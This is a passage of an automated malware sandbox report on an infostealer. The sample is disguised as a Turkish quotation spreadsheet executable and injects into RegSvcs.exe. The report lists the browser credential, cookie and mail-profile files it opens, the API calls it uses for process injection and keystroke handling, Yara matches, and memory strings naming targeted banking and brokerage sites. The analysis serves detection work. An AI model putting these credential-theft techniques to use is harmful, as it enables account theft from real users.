                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3939561592.0000000000908000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696494690o
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696494690t
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696494690x
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696494690f
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696494690t
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696494690s
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696494690t
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696494690t
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696494690o
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696494690j
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696494690s
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696494690j
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696494690x
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696494690f
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe API call chain: ExitProcess graph end node graph_0-104309
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe Code function: 0_2_01013F09 BlockInput 0_2_01013F09
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe Code function: 0_2_00FA3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW 0_2_00FA3B3A
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe Code function: 0_2_00FD5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer 0_2_00FD5A7C
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe Code function: 0_2_00FA4B37 LoadLibraryA,GetProcAddress 0_2_00FA4B37
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe Code function: 0_2_01260408 mov eax, dword ptr fs:[00000030h] 0_2_01260408
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe Code function: 0_2_01261A38 mov eax, dword ptr fs:[00000030h] 0_2_01261A38
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe Code function: 0_2_01261A98 mov eax, dword ptr fs:[00000030h] 0_2_01261A98
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe Code function: 0_2_00FF80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation 0_2_00FF80A9
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe Code function: 0_2_00FCA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter 0_2_00FCA155
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe Code function: 0_2_00FCA124 SetUnhandledExceptionFilter 0_2_00FCA124
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, COVID19.cs Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 4E4008
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe Code function: 0_2_00FF87B1 LogonUserW 0_2_00FF87B1
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe Code function: 0_2_00FA3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW 0_2_00FA3B3A
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe Code function: 0_2_00FA48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput 0_2_00FA48D7
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe Code function: 0_2_01004C27 mouse_event 0_2_01004C27
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe Code function: 0_2_00FF7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity 0_2_00FF7CAF
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe Code function: 0_2_00FF874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid 0_2_00FF874B
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe Binary or memory string: Shell_TrayWnd
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe Code function: 0_2_00FC862B cpuid 0_2_00FC862B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe Code function: 0_2_00FD4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter 0_2_00FD4E87
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe Code function: 0_2_00FE1E06 GetUserNameW 0_2_00FE1E06
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe Code function: 0_2_00FD3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte 0_2_00FD3F3A
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe Code function: 0_2_00FA49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo 0_2_00FA49A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara match File source: 00000002.00000002.3940377959.0000000002701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 2.2.RegSvcs.exe.770000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 2216, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 4780, type: MEMORYSTR
                  Source: Yara match File source: 2.2.RegSvcs.exe.770000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 2216, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 4780, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeBinary or memory string: WIN_81
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeBinary or memory string: WIN_XP
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeBinary or memory string: WIN_XPe
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeBinary or memory string: WIN_VISTA
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeBinary or memory string: WIN_7
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeBinary or memory string: WIN_8
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.770000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3940377959.000000000280C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 2216, type: MEMORYSTR
